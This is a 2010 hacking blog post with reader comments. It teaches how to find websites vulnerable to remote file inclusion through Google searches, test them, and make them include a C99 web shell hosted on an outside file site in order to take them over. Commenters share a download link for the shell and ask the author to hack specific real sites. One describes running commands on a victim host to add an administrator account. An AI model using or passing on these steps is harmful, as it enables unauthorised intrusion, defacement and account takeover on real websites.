Saturday, August 28, 2010

How to hack websites using Remote file inlcusion

 I receive many E-mails on How To Hack websites so,
 today I will demonstrate how hackers use remote file inlcusion to deface websites.

Requirements
C99 shell


First of all visit google and type

"index.php?page="

This will show all the pages which have index.php?page=" in their url, RFI vulnerabilities only work on those sites which have index.php?page= in their url.


Now lets say that the website is as follows:


www.targetsite.com/index.php?page=something


so to check the vulnerability we will replace the something to
Google or any other site now if Google homepage shows up this means that the website is vulnerable to the attack.The url will look like



                                                       
www.targetsite.com/index.php?page=www.google.com



Once we know that the website is vulnerable to the attack we will now include the c99 shell.To do it download the c99 shell and then upload it to a webhosting site such as Welcome to Ripway.com - free file hosting, free music hosting, direct linking or Most Endorsed FREE Website Hosting Provider | Free Web Hosting


Once the shell is uploaded you will have a unique url for your shell lets say it is


www.webhostingsite.com/c99.txt


Now to execute the shell in order to gain access to the website we will do as follows


http://www.targetsite.com/index.php?...e.com/c99.txt?


Dont forgett the "?" or else it wont be executed.


Remeber this does not work on all websites so the key is to try and try and try and try! 

 ..............................................................................................................................................................................................
..................................................................................................................................................................................................
..................................................................................................................................................................................................... 

9 comments:

  1. where to get cc99 shell from....can u provide download link for that

    ReplyDelete
  2. Hi frkhan,
    Thanks for commenting
    here is the shell url
    http://www.megaupload.com/?d=D7J1Y8YD

    ReplyDelete
  3. hi can you hack this site??
    http://tagum.umindanao.edu.ph/index.shtml

    ReplyDelete
  4. weng May be i can,but this is not vulnerable to RFI,
    KEEP VISITING
    REGARDS,

    ReplyDelete
  5. Adnan Can You Hack This Site
    http://www.pokemoncreed.net/

    ReplyDelete
  6. are you that anjum which has made a blog abour burn hall....and tell us about zoombie_ksa.......I had listened about it but do not know where he lives ... thanks for your this great blog

    ReplyDelete
  7. Your Welcome Ahmed,
    He Belongs to pakistan
    Keep Visiting
    Regards,

    ReplyDelete
  8. 1 ) thanks ....but you are that anjum that had made a blog about burn hall college ..

    2 ) and i had listened that zoombie_ksa is a famous pakistani hacker that had hacked yahoo, google , bing etc ...Is it true..

    3 ) If yes then tell us how to hack these major site...
    thanks for so good blog..
    ''regards''

    ReplyDelete
  9. this very kool! :D
    and i have a question for you.
    I uploaded my shell c99 to victim's host...but i have some problem when i execute cmd...
    code: net user >>this done! :D
    but: net user usertest passtest /add
    and net localgroup Administrators usertest >>this's nothing! :((
    can you help me?
    (note: victim's host Apache/2.2.14 (Win32) PHP/5.3.0 , don't run safe mode)

    ReplyDelete